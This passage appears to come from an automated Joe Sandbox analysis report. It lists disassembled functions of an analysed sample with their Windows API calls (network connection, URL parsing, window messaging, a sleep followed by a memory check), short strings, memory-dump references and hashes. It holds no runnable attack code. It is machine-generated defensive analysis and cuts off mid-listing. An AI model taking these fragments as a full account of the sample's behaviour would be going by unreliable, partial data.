                                                        • Opcode Fuzzy Hash: 0fdc6f0c53801efae2e5fb4aff7101b89ae47467f55d3c6d526a05d0a789dfba
                                                        • Instruction Fuzzy Hash: 19E01A74800204DFCB419FB1D80866DBBB1FF48710B209018E90AF7260D7385906AF60
                                                        Function 00E64D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF7620: _wcslen.LIBCMT ref: 00DF7625
                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00E64ED4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Connection_wcslen
                                                        • String ID: *$LPT
                                                        • API String ID: 1725874428-3443410124
                                                        • Opcode ID: 9673470c2d46a0f06d1244c9d92453e0ecd1f8ae120b361bc09c62cd7c19d872
                                                        • Instruction ID: 90469768ee977312a1b0bbb1fe79034c308f393164af6ba5bd80b27dc164e7f3
                                                        • Opcode Fuzzy Hash: 9673470c2d46a0f06d1244c9d92453e0ecd1f8ae120b361bc09c62cd7c19d872
                                                        • Instruction Fuzzy Hash: BB9153B5A002049FCB14DF54D484EA9BBF1FF44348F19A099E40AAF392D775ED85CB61
                                                        Function 00E1E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 00E1E30D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__start
                                                        • String ID: pow
                                                        • API String ID: 3213639722-2276729525
                                                        • Opcode ID: 87266203be59c0a273593bce6368f525415646cd73a0ef0d4e8ab8687f9cec78
                                                        • Instruction ID: 982d1f2db14f833162333f141a340dc4cda81c7fbf0c6395dcf667705644dc87
                                                        • Opcode Fuzzy Hash: 87266203be59c0a273593bce6368f525415646cd73a0ef0d4e8ab8687f9cec78
                                                        • Instruction Fuzzy Hash: 3A519D71A0C2129ACB157724ED013FA3BE4EB41744F34699DF8E6723E9DB348CC59A46
                                                        Function 00E77771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(00E4569E,00000000,?,00E8CC08,?,00000000,00000000), ref: 00E778DD
                                                          • Part of subcall function 00DF6B57: _wcslen.LIBCMT ref: 00DF6B6A
                                                        • CharUpperBuffW.USER32(00E4569E,00000000,?,00E8CC08,00000000,?,00000000,00000000), ref: 00E7783B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper$_wcslen
                                                        • String ID: <s
                                                        • API String ID: 3544283678-2940880691
                                                        • Opcode ID: fae12e4e2d2d92d3ef65fa389538047a06dae773f12c32e0dc5d4e6aa94bcb92
                                                        • Instruction ID: ee45e4733f5e2d72f438ca672be4e2acef340f214ad6252bdeb7b270e5d3aa7e
                                                        • Opcode Fuzzy Hash: fae12e4e2d2d92d3ef65fa389538047a06dae773f12c32e0dc5d4e6aa94bcb92
                                                        • Instruction Fuzzy Hash: 90615E72914129AACF04EBA4CC91DFDB3B4FF14304B55A129E686B3191EF709A05CBB0
                                                        Function 00E0E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #
                                                        • API String ID: 0-1885708031
                                                        • Opcode ID: 490385b15dc61b92efa40c36ad0d09585666e6b29364f8db1b94a0d647fb1069
                                                        • Instruction ID: 1e456043ec06fafa0c543176f7537034663f8a017fad6ce3db2de7aad7b99763
                                                        • Opcode Fuzzy Hash: 490385b15dc61b92efa40c36ad0d09585666e6b29364f8db1b94a0d647fb1069
                                                        • Instruction Fuzzy Hash: C4514435901246DFDB18DF68D085AFA7BA4FF15324F249466E891BB3E0D6309D82CBA0
                                                        Function 00E0F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00E0F2A2
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E0F2BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: 97b878bfb4d890a8d6e52568fe9ff84a9b98b24366f7784f7c94b34fc99ee2c4
                                                        • Instruction ID: e159932da7456ee861d6ac00f44dc8c2cc3e9b38529b8c5b2fc98c4440eab2cd
                                                        • Opcode Fuzzy Hash: 97b878bfb4d890a8d6e52568fe9ff84a9b98b24366f7784f7c94b34fc99ee2c4
                                                        • Instruction Fuzzy Hash: BD5159714187499BD320AF15D886BABB7F8FF85300F82884CF2D951195EB309929CB76
                                                        Function 00E75745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00E757E0
                                                        • _wcslen.LIBCMT ref: 00E757EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper_wcslen
                                                        • String ID: CALLARGARRAY
                                                        • API String ID: 157775604-1150593374
                                                        • Opcode ID: 58b5784ae1b1cbc06d0a01850642464fd25cb0bef5891a9ac5f3bfd80b76e710
                                                        • Instruction ID: 7a57fab79d672da683bb17f9813bf37791b6cf97f2b04b34474b87dd573db268
                                                        • Opcode Fuzzy Hash: 58b5784ae1b1cbc06d0a01850642464fd25cb0bef5891a9ac5f3bfd80b76e710
                                                        • Instruction Fuzzy Hash: A7418172E001099FDB18DFA9C8829BEBBF5EF59314F10A02DE509B7291D7709D81CBA1
                                                        Function 00E6D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00E6D130
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E6D13A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_wcslen
                                                        • String ID: |
                                                        • API String ID: 596671847-2343686810
                                                        • Opcode ID: 887d5ffecb647f3649ca30d1eae45661edd9be5d4030baa287f69f5f6032e81a
                                                        • Instruction ID: fb3bf5ff6d2d59ffa59116af4c97de6a8899ef1ecb0e510d208828b202b6034a
                                                        • Opcode Fuzzy Hash: 887d5ffecb647f3649ca30d1eae45661edd9be5d4030baa287f69f5f6032e81a
                                                        • Instruction Fuzzy Hash: 13315B71D01209ABCF11EFA5DC85AEEBFB9FF05344F008019F919B6166E771AA46CB60
                                                        Function 00E8356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00E83621
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E8365C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: 0bb068a73a44d9bd6dbe699ba76d5b8570a6a62b08c8b59406a571bf437dcbaa
                                                        • Instruction ID: 269bf8f46e5f5c8c91d0c368311c11eaf206e2e8d2bdc0042555a0cdf9abf1cf
                                                        • Opcode Fuzzy Hash: 0bb068a73a44d9bd6dbe699ba76d5b8570a6a62b08c8b59406a571bf437dcbaa
                                                        • Instruction Fuzzy Hash: 4A318171110604AEDB14EF38DC40EFB73A9FF48B24F10A619F95DA7190DA31AD91D760
                                                        Function 00E84537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00E8461F
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E84634
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: 72845334a8c761c99056aa1b3c250f787e19d9c6ce7483b5fcd7d49d73398f01
                                                        • Instruction ID: 419bf08975dde82e24bfe6e7b94c95e23ea3b4a378f7b5da0f5cc9d9dd4177d4
                                                        • Opcode Fuzzy Hash: 72845334a8c761c99056aa1b3c250f787e19d9c6ce7483b5fcd7d49d73398f01
                                                        • Instruction Fuzzy Hash: E93138B4A0030A9FDB14DFA9C980BDE7BB5FF49304F10506AE908AB381E770A941DF90
                                                        Function 00E831EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E8327C
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E83287
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 989ffc5e5d678fa1f9c515b093953bdf59168251203bd8eb77b72efabab79f55
                                                        • Instruction ID: ec7a9898fa9b1cd1225136329ab8f1373661da5e3bcc5126a7965b942a279210
                                                        • Opcode Fuzzy Hash: 989ffc5e5d678fa1f9c515b093953bdf59168251203bd8eb77b72efabab79f55
                                                        • Instruction Fuzzy Hash: FE11B2713002087FEF25AEA4DC84EBB376BEB94768F205528F91CB72A1D671DD518760
                                                        Function 00E83710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DF604C
                                                          • Part of subcall function 00DF600E: GetStockObject.GDI32(00000011), ref: 00DF6060
                                                          • Part of subcall function 00DF600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DF606A
                                                        • GetWindowRect.USER32(00000000,?), ref: 00E8377A
                                                        • GetSysColor.USER32(00000012), ref: 00E83794
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 4d970b0c66c2fc93b930bc30fbe12fedc7b80031087bea1ac71db13d8e240c17
                                                        • Instruction ID: f5108a21a470f9fc4f55846e540a7afc7af619e6c86edbd27f8d9a9d87f82268
                                                        • Opcode Fuzzy Hash: 4d970b0c66c2fc93b930bc30fbe12fedc7b80031087bea1ac71db13d8e240c17
                                                        • Instruction Fuzzy Hash: 991129B2610209AFDF00EFB8CC45EEA7BB8EB09714F105925FD59E2250E735E8559B60
                                                        Function 00E6CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E6CD7D
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E6CDA6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 8a6473c4daf2fb51349a8f450886fad33ab83b368f537043c3219d6b2a82de17
                                                        • Instruction ID: a6328cf291b3b41bc31313b73f56fa139763aa51ef8c6e2b5c2f02fd06678e42
                                                        • Opcode Fuzzy Hash: 8a6473c4daf2fb51349a8f450886fad33ab83b368f537043c3219d6b2a82de17
                                                        • Instruction Fuzzy Hash: 701106712816317AD7344B669C44EF7BE6CEF137E8F205226B189A3080D3749845D6F0
                                                        Function 00E83429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00E834AB
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E834BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: a26cec03d10a279ca0caa80bafb47f4fd8c4e936d825435438ca064fff8c6f24
                                                        • Instruction ID: 9f9fa8f7e184a1842bd8ad51ed746204c6d5e2e9a56afde2d9df4122faabbe5b
                                                        • Opcode Fuzzy Hash: a26cec03d10a279ca0caa80bafb47f4fd8c4e936d825435438ca064fff8c6f24
                                                        • Instruction Fuzzy Hash: 6F116D71100208AEEB12AE74DC44AFA376AEF05B78F606724F97DA31E0C771DC559760
                                                        Function 00E56C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                        • CharUpperBuffW.USER32(?,?,?), ref: 00E56CB6
                                                        • _wcslen.LIBCMT ref: 00E56CC2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharUpper
                                                        • String ID: STOP
                                                        • API String ID: 1256254125-2411985666
                                                        • Opcode ID: 9ea1bf6e33abc186d4083763d31ee2f15fb376ec5283b239d6a6c347a8125a60
                                                        • Instruction ID: 8303363d9c837d09ca86eabbca0249263f5617680818ee7e3a1c9aa18803bece
                                                        • Opcode Fuzzy Hash: 9ea1bf6e33abc186d4083763d31ee2f15fb376ec5283b239d6a6c347a8125a60
                                                        • Instruction Fuzzy Hash: 32010832A005268ACB11AFBDCC809BFB3B4EB617157911D24EC52B7190FB31D808C760
                                                        Function 00E51CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                          • Part of subcall function 00E53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E53CCA
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E51D4C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 624084870-1403004172
                                                        • Opcode ID: f1362a9efbc2f41e43fc2a1fafdaa9b5d0474d3e87132c20bfa25b785554ab36
                                                        • Instruction ID: cf6e7fb415eaca824131abd16f0c82dd9427ed3174c5879de481d1a799a90461
                                                        • Opcode Fuzzy Hash: f1362a9efbc2f41e43fc2a1fafdaa9b5d0474d3e87132c20bfa25b785554ab36
                                                        • Instruction Fuzzy Hash: F901D871A01218AB8B14EFA4CC51EFEB7B8EF46391B145D59FC26772C1EA31590C8771
                                                        Function 00E51BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                          • Part of subcall function 00E53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E53CCA
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E51C46
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 624084870-1403004172
                                                        • Opcode ID: b8142a0b9b7438c1b585a87b0c089dfec01a6b19e894c65c3617919792c1aafb
                                                        • Instruction ID: 92a4b99575591f0ee66b7c86f1c8b612dd0929ee4fc12097e461516db331e34d
                                                        • Opcode Fuzzy Hash: b8142a0b9b7438c1b585a87b0c089dfec01a6b19e894c65c3617919792c1aafb
                                                        • Instruction Fuzzy Hash: 1601A775A812086ACB18EBA0C961BFFF7A8DF11381F141859ED0677281EA219E1CC6B1
                                                        Function 00E51C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                          • Part of subcall function 00E53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E53CCA
